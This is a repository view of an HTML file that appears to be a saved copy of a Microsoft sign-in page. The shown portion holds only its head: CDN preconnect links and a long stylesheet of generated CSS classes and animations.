File size: 41,300 Bytes
c7d3b49 bf78bfc c7d3b49 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258 1259 1260 1261 1262 1263 1264 1265 1266 1267 1268 1269 1270 1271 1272 1273 1274 1275 1276 1277 1278 1279 1280 1281 1282 1283 1284 1285 1286 1287 1288 1289 1290 1291 1292 1293 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305 1306 1307 1308 1309 1310 |
<html dir="ltr" lang="JA-JP"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><link rel="stylesheet" type="text/css" href="cid:[email protected]"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="preconnect" href="https://acctcdn.msauth.net/" crossorigin="">
<link rel="preconnect" href="https://acctcdn.msftauth.net/" crossorigin="">
<link rel="preconnect" href="https://logincdn.msftauth.net/" crossorigin="">
<meta http-equiv="x-dns-prefetch-control" content="on">
<link rel="dns-prefetch" href="https://acctcdn.msauth.net/">
<link rel="dns-prefetch" href="https://acctcdn.msftauth.net/">
<link rel="dns-prefetch" href="https://acctcdnmsftuswe2.azureedge.net/">
<link rel="dns-prefetch" href="https://logincdn.msauth.net/">
<link rel="dns-prefetch" href="https://logincdn.msftauth.net/">
<link rel="dns-prefetch" href="https://lgincdnmsftuswe2.azureedge.net/"><style>@charset "utf-8";
@keyframes f1t2sqxk {
0% { left: 0px; opacity: 1; }
100% { left: -200px; opacity: 0; }
}
@keyframes f1o4taax {
0% { right: 0px; opacity: 1; }
100% { right: -200px; opacity: 0; }
}
@keyframes fr2e2iv {
0% { left: 200px; opacity: 0; }
100% { left: 0px; opacity: 1; }
}
@keyframes fadpgrp {
0% { right: 200px; opacity: 0; }
100% { right: 0px; opacity: 1; }
}
@keyframes f1wj94rl {
0% { left: 0px; opacity: 1; }
100% { left: 200px; opacity: 0; }
}
@keyframes fgv3477 {
0% { right: 0px; opacity: 1; }
100% { right: 200px; opacity: 0; }
}
@keyframes fs3h71u {
0% { left: -200px; opacity: 0; }
100% { left: 0px; opacity: 1; }
}
@keyframes fkaajju {
0% { right: -200px; opacity: 0; }
100% { right: 0px; opacity: 1; }
}
@keyframes f11ta6k4 {
0% { opacity: 0; }
}
@keyframes f1y1g2h0 {
100% { opacity: 0; }
}
@keyframes f5j8bii {
0% { opacity: 0; }
100% { opacity: 1; }
}
@keyframes fxbh352 {
0%, 20% { left: 0%; animation-timing-function: ease-out; opacity: 0; }
25% { opacity: 1; }
35% { left: 45%; animation-timing-function: linear; }
65% { left: 60%; animation-timing-function: ease-in; }
75% { opacity: 1; }
80%, 100% { left: 100%; opacity: 0; }
}
@keyframes f5ncg2c {
0%, 20% { right: 0%; animation-timing-function: ease-out; opacity: 0; }
25% { opacity: 1; }
35% { right: 45%; animation-timing-function: linear; }
65% { right: 60%; animation-timing-function: ease-in; }
75% { opacity: 1; }
80%, 100% { right: 100%; opacity: 0; }
}
@charset "utf-8";
@media screen and (-ms-high-contrast: active) {
.f1udaver { outline-style: none; }
}
@media screen and (-ms-high-contrast: active) {
.f1ryksfz { border-top-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f16eid17 { border-right-width: 1px; }
.f1q3z31i { border-left-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.fawybe { border-bottom-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f9i133b { border-top-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.f14o58e2 { border-left-style: solid; }
.fsjinwp { border-right-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.f16rpbht { border-bottom-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.f1lamlky { border-top-color: window; }
}
@media screen and (-ms-high-contrast: active) {
.f1kw3rgo { border-left-color: window; }
.f2l6bog { border-right-color: window; }
}
@media screen and (-ms-high-contrast: active) {
.f9ipe2e { border-bottom-color: window; }
}
@media screen and (-ms-high-contrast: active) {
.f1fi9k2w { background-color: window; }
}
@media screen and (-ms-high-contrast: active) {
.f1am4lky { color: windowtext; }
}
@media screen and (-ms-high-contrast: active) {
.fdpodh3:hover { outline-style: none; }
}
@media screen and (-ms-high-contrast: active) {
.fmwxxdv:hover { border-top-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f1ds7fx2:hover { border-right-width: 1px; }
.f1fv83b1:hover { border-left-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f1c5tp0y:hover { border-bottom-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f112k52l:hover { border-top-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.f1txpo1x:hover { border-left-style: solid; }
.f1x8bs3n:hover { border-right-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.f1ocwwa8:hover { border-bottom-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.fqkc768:hover { border-top-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.f4n3n3y:hover { border-right-color: highlight; }
.fvaa0r1:hover { border-left-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.fe2005u:hover { border-bottom-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.fk0u3lu:hover { background-color: window; }
}
@media screen and (-ms-high-contrast: active) {
.f1qsschd:hover { color: windowtext; }
}
@media screen and (-ms-high-contrast: active) {
.f18wuzd:hover:focus { outline-style: none; }
}
@media screen and (-ms-high-contrast: active) {
.f5m1iti:hover:focus { border-top-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f14l2i49:hover:focus { border-right-width: 1px; }
.f1czw4g6:hover:focus { border-left-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.fhzshfc:hover:focus { border-bottom-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.fhgzi3m:hover:focus { border-top-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.f1pnpshs:hover:focus { border-left-style: solid; }
.fh5prtf:hover:focus { border-right-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.f2i3lp1:hover:focus { border-bottom-style: solid; }
}
@media screen and (-ms-high-contrast: active) {
.f12qf4w9:hover:focus { border-top-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.f1b4of5y:hover:focus { border-left-color: highlight; }
.fk88hd3:hover:focus { border-right-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.fwx2m9m:hover:focus { border-bottom-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.fzbp7qu:hover:focus { background-color: window; }
}
@media screen and (-ms-high-contrast: active) {
.f73d0br:hover:focus { color: windowtext; }
}
@media screen and (-ms-high-contrast: active) {
.f8ofn9z:focus { outline-style: none; }
}
@media screen and (-ms-high-contrast: active) {
.f47ck3e:focus { border-top-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f6iv4em:focus { border-right-width: 1px; }
.f7qlcaz:focus { border-left-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.fdte1ka:focus { border-bottom-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.fhgci9l:focus { border-top-style: dashed; }
}
@media screen and (-ms-high-contrast: active) {
.f1s1c6xg:focus { border-left-style: dashed; }
.ftuaf1g:focus { border-right-style: dashed; }
}
@media screen and (-ms-high-contrast: active) {
.f2rybsq:focus { border-bottom-style: dashed; }
}
@media screen and (-ms-high-contrast: active) {
.fh9yr33:focus { border-top-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.f1fv49x2:focus { border-right-color: highlight; }
.faoimel:focus { border-left-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.f4323t4:focus { border-bottom-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.ft4kwvt:focus { background-color: window; }
}
@media screen and (-ms-high-contrast: active) {
.fj0h0bv:focus { color: windowtext; }
}
@media screen and (-ms-high-contrast: active) {
.f1hykqis:active { outline-style: none; }
}
@media screen and (-ms-high-contrast: active) {
.fuskam8:active { border-top-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f13sg5ve:active { border-left-width: 1px; }
.f1mgpxjn:active { border-right-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f5qfn8f:active { border-bottom-width: 1px; }
}
@media screen and (-ms-high-contrast: active) {
.f12a7bz1:active { border-top-style: dashed; }
}
@media screen and (-ms-high-contrast: active) {
.f1ehnz16:active { border-left-style: dashed; }
.f1h794hn:active { border-right-style: dashed; }
}
@media screen and (-ms-high-contrast: active) {
.fwayt1o:active { border-bottom-style: dashed; }
}
@media screen and (-ms-high-contrast: active) {
.f1ifcrz3:active { border-top-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.f1lf9w9v:active { border-right-color: highlight; }
.fyto7u:active { border-left-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.fx45lto:active { border-bottom-color: highlight; }
}
@media screen and (-ms-high-contrast: active) {
.f1dldl6n:active { background-color: window; }
}
@media screen and (-ms-high-contrast: active) {
.f6f3rsm:active { color: windowtext; }
}
@charset "utf-8";
@media (-ms-high-contrast: active) {
.felxxx9 { }
}
@media (-ms-high-contrast: active) {
.fqttjmt:hover { }
}
@charset "utf-8";
* { box-sizing: border-box; }
body { font-weight: 400; font-family: "Segoe UI", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math"; font-size: 0.9375rem; line-height: 1.25rem; margin: 0px; background-color: rgb(255, 255, 255); }
pre { overflow: auto; font-family: inherit; }
button, input, select, textarea { font-weight: inherit; font-family: inherit; font-size: inherit; line-height: inherit; max-width: 100%; margin: 0px; }
input[type="checkbox"] { width: 20px; height: 20px; box-sizing: border-box; padding: 0px; }
input[type="checkbox"]:focus { outline: -webkit-focus-ring-color auto 5px; outline-offset: 0px; }
input[type="radio"]:focus { outline: -webkit-focus-ring-color auto 5px; outline-offset: -1px; }
input[type="number"] { outline: none; border-radius: 0px; height: 36px; border-width: 0px 0px 1px; padding: 6px 10px 6px 0px; border-color: rgba(0, 0, 0, 0.6); border-style: solid; }
input[type="number"]:focus { border-color: rgb(0, 103, 184); }
a { color: rgb(0, 103, 184); text-decoration: none; }
a:hover { text-decoration: underline; color: rgb(102, 102, 102); }
ul { padding-left: 0px; list-style: none; }
ol, ul { margin-top: 20px; margin-bottom: 20px; }
li { margin-top: 12px; margin-bottom: 12px; }
select { border-width: 0px 0px 1px; padding: 6px 0px; height: 36px; outline-style: none; background-color: transparent; border-style: solid; border-color: rgba(0, 0, 0, 0.6); }
select:focus { border-width: 1px; padding: 6px 0px; height: 36px; outline-style: none; background-color: rgb(238, 238, 238); border-style: solid; border-color: rgb(0, 103, 184); }
option { max-width: 100%; line-height: inherit; font-weight: normal; display: block; white-space: nowrap; min-height: 1.2em; padding: 0px 2px 1px; background-color: rgb(255, 255, 255); }
label { display: inline-block; max-width: 100%; }
#root { min-height: 1px; }
.f1wv5yrl { min-height: 1px; }
.f1euv43f { position: absolute; }
.f1l02sjl { height: 100%; }
.fly5x3f { width: 100%; }
.f15twtuk { top: 0px; }
.f1e31b4d { right: 0px; }
.f1vgc2s3 { left: 0px; }
.f1yab3r1 { bottom: 0px; }
.f1oy3dpc { overflow-x: auto; }
.f5zp4f { overflow-y: auto; }
.f1w4nmp0 { display: table; }
.f15pt5es { display: table-cell; }
.fmrv4ls { vertical-align: middle; }
.fcgxt0o { margin-left: auto; }
.f1ujusj6 { margin-right: auto; }
.f10pi13n { position: relative; }
.f17n1hoa { max-width: 440px; }
.fdavl6g { width: calc(100% - 40px); }
.f1qo6d5h { padding-top: 44px; }
.fdeuxjd { padding-right: 44px; }
.f9y0skx { padding-left: 44px; }
.f1ezb54v { padding-bottom: 44px; }
.f16w32qi { margin-bottom: 28px; }
.folxr9a { background-color: rgb(255, 255, 255); }
.f1fdtd47 { box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 6px; }
.f11pj6g1 { }
.f1xvk1ai { box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 6px; }
.f14hp5dx { min-width: 320px; }
.fh2bsio { min-height: 338px; }
.f1p9o1ba { overflow-x: hidden; }
.f1sil6mw { overflow-y: hidden; }
.fyoomso has-popup { margin-bottom: 20px; }
.f19g0ac { z-index: 1; }
.f1532mdf { margin-bottom: 48px; }
.f140knbv { margin-bottom: 20px; }
.fhynomj { margin-top: 48px; }
.f16wzh4i { font-weight: bold; }
.fy6ml6n { background-color: white; }
.fk73vx1 { opacity: 0; }
.f1ve553k { }
.f1bsuimh { z-index: -1; }
.f1sr5fc { }
.f8kefer { }
.f9eofwr { }
.f1xxrpeh { transition: 0.5s ease-in; }
.f1hc5s0a { z-index: 10; }
.fdayyex { opacity: 0.5; }
.foh98i6 { min-height: 206px; }
.f11f2yzx { min-height: 170px; }
.fyj6yjy { max-width: 640px; }
.f15tpi3i { margin-bottom: 16px; }
.f1l6wl2o { margin-top: 36px; }
.f17xhvzl { margin-bottom: 36px; }
.ftgm304 { display: block; }
.fwrgwhw { background-image: none; }
.f1tyq0we { margin-left: 0px; }
.f11qmguv { margin-right: 0px; }
.f1uinfot { margin-top: 16px; }
.f1jlhsmd { margin-bottom: 12px; }
.f1g0x7ka { padding-top: 0px; }
.fhxju0i { padding-right: 0px; }
.f1cnd47f { padding-left: 0px; }
.f1qch9an { padding-bottom: 0px; }
.fq1bxqj { font-size: 0.75rem; }
.faxwjyg { line-height: 0.875rem; }
.f71fsbu { font-weight: 400; }
.f6jzhm1 { }
.f19jgwib { }
.fs2xy7y { }
.fqu4ifd { }
.fq1loh5 { padding-top: 2px; }
.futqtb8 { padding-bottom: 2px; }
.f19f4twv { margin-bottom: 0px; }
.f1hu3pq6 { margin-top: 0px; }
.fhx3js9 { overflow-wrap: break-word; }
.fibxuh5 { white-space: pre-wrap; }
.f17mccla { text-align: center; }
.fd7fpy0 { visibility: hidden; }
.fjseox { display: none; }
.f19dog8a { position: fixed; }
.f5gq2j6 { bottom: 0px; }
.f10k790i { right: 0px; }
.f1xynx9j { left: 0px; }
.f1uea2e { height: 0px !important; }
.f11ftqxx { width: 0px !important; }
.f183mx53 > div:nth-child(1) { display: inline-block; }
.f1turhiw > div:nth-child(1) { width: 100%; }
.f1rmqj0e > div:nth-child(1) { margin-bottom: 36px; }
.f1cv068v { background-color: rgba(255, 255, 255, 0.65); }
.ftiweyp { color: rgb(232, 17, 35); }
.f1lmfglv { margin-top: 0px; }
.fibjyge { margin-right: 0px; }
.f9yszdx { margin-left: 0px; }
.f1abmfm4 { margin-bottom: 0px; }
.f1amhqqw { font-size: 0.85rem; }
.fo7qwa0 { padding-left: 15px; }
.ffyari3 { padding-right: 15px; }
.f1pbo8a8 { font-size: 2.5rem; }
.f1wl9k8s::before { content: ""; }
.f172uz90::before { display: table; }
.f1rf9b64::after { clear: both; }
.f13zj6fq::after { content: ""; }
.fwjju16::after { display: table; }
.f14t3ns0 { display: inline-block; }
.fedgsey { font-size: 0.8125rem; }
.fhuq1gn { font-weight: 600; }
.ffbbzdd { line-height: 1.25rem; }
.f6dzj5z { max-width: 100%; }
.fj602k5 { padding-bottom: 0.227px; }
.f1acqsno { padding-top: 0.227px; }
.f161knb0 { padding-left: 2px; }
.f12huiiw { padding-right: 2px; }
.f1xlm3kd { margin-top: 14px; }
.f3nz2xt { margin-bottom: 14px; }
.fv6zc3m { font-size: 0.75rem; }
.f2zxqi { margin-top: 8px; }
.febqm8h { margin-bottom: 8px; }
.f12lm4oi { margin-left: 20px; }
.fzaimmi { margin-right: 20px; }
.f1t4cmql { display: list-item; }
.fuxrj8o { list-style-type: disc; }
.f22iagw { display: flex; }
.f4d9j23 { justify-content: center; }
.fses1vf { font-size: 14px; }
.f1d4rezt { width: 275px; }
.fecqxwr { height: 200px; }
.f6c6jrs { animation-duration: 0.25s; }
.f1loq5m1 { animation-timing-function: cubic-bezier(0.5, 0, 0.5, 1); }
.fywypte { animation-fill-mode: both; }
.fvn4fo7 { transition-property: left; }
.f9lgmqf { transition-property: right; }
.fyj4w0g { animation-name: f1t2sqxk; }
.f1ny75et { animation-name: f1o4taax; }
.f1n5kmys { animation-name: fr2e2iv; }
.f9cdjqp { animation-name: fadpgrp; }
.f1qp9no5 { animation-name: f1wj94rl; }
.f13ngk7n { animation-name: fgv3477; }
.fubu9h7 { animation-name: fs3h71u; }
.fm4if6k { animation-name: fkaajju; }
.fi23lvw { transition-timing-function: ease-in; }
.foj7m9f { animation-duration: 0.3s; }
.f1yeby2y { animation-name: f11ta6k4; }
.f1gl45w1 { transition-timing-function: ease-in; }
.f1g1znd9 { animation-timing-function: cubic-bezier(0.5, 0, 0.5, 1); }
.f6fch53 { animation-duration: 0.3s; }
.f1btgwtp { }
.fgd3u99 { }
.f1pshqt5 { }
.fqa7tw4 { transition-timing-function: ease-out; }
.f58rhpz { animation-name: f1y1g2h0; }
.f1y6io0n { transition-timing-function: ease-out; }
.f1soicvf { }
.fk4wq3q { background-size: cover; }
.fo6xqva { background-repeat: no-repeat; }
.fj9j8l8 { background-position-x: 50%; }
.f1b6djjb { background-position-y: 50%; }
.f59ln6l { background-color: rgba(0, 0, 0, 0.55); }
.f15lkw1v { }
.ff2sm71 { height: 48px; }
.f1kcqot9 { padding-top: 12px; }
.f15kemlc { padding-right: 24px; }
.fdgang7 { padding-left: 24px; }
.fpe6lb7 { padding-bottom: 12px; }
.f1rmagzu { max-height: 24px; }
.f19c81sj { max-width: 150px; }
.fre7gi1 { border-top-width: 0px; }
.f1358rze { border-right-width: 0px; }
.f1rvrf73 { border-left-width: 0px; }
.fqdk4by { border-bottom-width: 0px; }
.f2rbwfs { max-width: 256px; }
.f10kou7y { max-height: 36px; }
.fvueend { margin-bottom: 24px; }
.f1iuewzk { animation-duration: 1s; }
.f1h7u52p { animation-name: f5j8bii; }
.fwvmpdj { margin-top: 44px; }
.f14k6m1a { font-family: Verdana; }
.f4ybsrx { font-size: 16px; }
.ftqha64 { color: rgb(24, 24, 24); }
.frvgh55 { height: 24px; }
.fl3k0kj { background-color: window; }
.f1mtd64y { overflow-x: visible; }
.f1y7q3j9 { overflow-y: visible; }
.f1wirg6b { z-index: auto; }
.f1hgrdrl { clear: both; }
.f1ysfysz { min-height: 28px; }
.f1icddqz { background-color: rgba(0, 0, 0, 0.6); }
.fpaq0wn { }
.fanxd30 { font-size: 13px; }
.f150nix6 { float: right; }
.f6ogs8q { float: left; }
[dir="rtl"] .f12v9mrw { float: left; }
[dir="rtl"] .f1tk1al1 { float: right; }
.f1qymw5e { margin-top: -5px; }
.fgbriwd { justify-content: right; }
.fc7pyfw { justify-content: left; }
[dir="rtl"] .fhc64sm { justify-content: left; }
[dir="rtl"] .f1itdf7t { justify-content: right; }
.fusgiwz { color: rgb(0, 0, 0); }
.f1ugzwwg { font-size: 12px; }
.f336tjw { line-height: 28px; }
.fz5stix { white-space: nowrap; }
.ff9s3yw { margin-left: 8px; }
.f1phki43 { margin-right: 8px; }
.f1bsjrm3 { text-decoration: none; }
.f1wzsntn has-background { color: rgb(255, 255, 255); }
.f1b8mhjz { color: rgb(255, 255, 255); }
.f1mh47zh { letter-spacing: 3px; }
.f82itaf { line-height: 22px; }
.f12kltsn { vertical-align: top; }
.fnsq08h { font-size: 11px; }
.fb7lm33 { text-decoration: underline; }
.f1w7gpdv { display: inline; }
.f19ph88b { min-height: inherit; }
.f13qgvxu { color: rgb(0, 0, 0); }
.frkrog8 { width: 1px; }
.f1mpe4l3 { height: 1px; }
.f4spc52 { left: -10000px; }
.fiw9o4d { right: -10000px; }
.f16kh0oo { top: -10000px; }
[dir="rtl"] .f1wgmumt { left: unset; }
[dir="rtl"] .f1vpah81 { right: unset; }
[dir="rtl"] .fwxdmvy { right: -10000px; }
[dir="rtl"] .fyuelv8 { left: -10000px; }
.f13az8dq { background-color: rgb(242, 242, 242); }
.fuq56rw { padding-top: 24px; }
.f1va5vgb { padding-bottom: 36px; }
.far769 { margin-top: 76px; }
.fxvlyis { margin-right: -44px; }
.f1sq1oqb { margin-left: -44px; }
.flu7nlv { margin-bottom: -44px; }
.f1pe5jkt > p:first-child { margin-top: 0px; }
.fysrem1 > p:last-child { margin-bottom: 0px; }
.f11r83ys { background-color: rgba(242, 242, 242, 0.2); }
.f3rmtva { background-color: transparent; }
.f129pbty { padding-inline: 5px; }
.f1pit55b { border-top-width: 0px; }
.f1orqat1 { border-right-width: 0px; }
.ffbvwxd { border-left-width: 0px; }
.f136mcbi { border-bottom-width: 0px; }
.f1k6fduh { cursor: pointer; }
.f1rispym { min-width: fit-content; }
.ffmhhld { color: rgb(27, 27, 27); }
.fzzj3pj { font-size: 1.5rem; }
.f1nbblvp { padding-top: 0px; }
.fifp7yv { padding-right: 0px; }
.f1asdtw4 { padding-left: 0px; }
.f1ov4xf1 { padding-bottom: 0px; }
.f1n95isl { line-height: 20px; }
.f1pxv85q { margin-right: 10px; }
.f1oou7ox { margin-left: 10px; }
.fi0ndl { font-size: 1.3rem; }
.frecw6t input { height: 36px; }
.f1mmgjok input { width: 100%; }
.f1tto2h8 input { outline-style: none; }
.f1c2pb84 input { background-color: transparent; }
.fyft3pb input { border-top-style: solid; }
.f1rof34y input { border-right-style: solid; }
.f4hylce input { border-left-style: solid; }
.f1172n73 input { border-bottom-style: solid; }
.f18s3fau input { border-bottom-right-radius: 0px; }
.f1ymw6u3 input { border-bottom-left-radius: 0px; }
.f1xqrj1d input { border-top-right-radius: 0px; }
.f160kle0 input { border-top-left-radius: 0px; }
.f6rydpu input { border-top-width: 0px; }
.f1i9lmva input { border-right-width: 0px; }
.f2x7bcd input { border-left-width: 0px; }
.fspveqh input { border-bottom-width: 1px; }
.f1imcvf3 input { border-top-color: rgb(102, 102, 102); }
.f1bxicz3 input { border-right-color: rgb(102, 102, 102); }
.fajq0z4 input { border-left-color: rgb(102, 102, 102); }
.f1kf6f3a input { border-bottom-color: rgb(102, 102, 102); }
.fyw0hav input { padding-top: 6px; }
.f1a7xkls input { padding-right: 10px; }
.f18r4b1u input { padding-left: 10px; }
.fnpm3l input { padding-bottom: 6px; }
.fsc3mvo input { padding-left: 0px; }
.f13gms8m input { padding-right: 0px; }
.f1s66rt0 input:hover { border-top-color: rgb(50, 50, 50); }
.f73ugz1 input:hover { border-right-color: rgb(50, 50, 50); }
.f5iv370 input:hover { border-left-color: rgb(50, 50, 50); }
.f1iw8vv5 input:hover { border-bottom-color: rgb(50, 50, 50); }
.f1ytw2m8 input:focus { border-top-color: rgb(0, 103, 184); }
.feh5m5c input:focus { border-right-color: rgb(0, 103, 184); }
.fexuuuk input:focus { border-left-color: rgb(0, 103, 184); }
.f7upnml input:focus { border-bottom-color: rgb(0, 103, 184); }
.fklagwq input.has-error { border-top-color: rgb(209, 52, 56); }
.fsjklvg input.has-error { border-right-color: rgb(209, 52, 56); }
.f123zcai input.has-error { border-left-color: rgb(209, 52, 56); }
.f1uvsclk input.has-error { border-bottom-color: rgb(209, 52, 56); }
.f1063pyq { flex-direction: row; }
.f1nari41 { align-items: end; }
[dir="rtl"] .f95eok8 { margin-left: unset; }
[dir="rtl"] .f1janne { margin-right: unset; }
[dir="rtl"] .fntngf7 { margin-right: 8px; }
[dir="rtl"] .f18xdtcp { margin-left: 8px; }
.f8ljn23 { height: 36px; }
.f1f09k3d { border-bottom-width: 1px; }
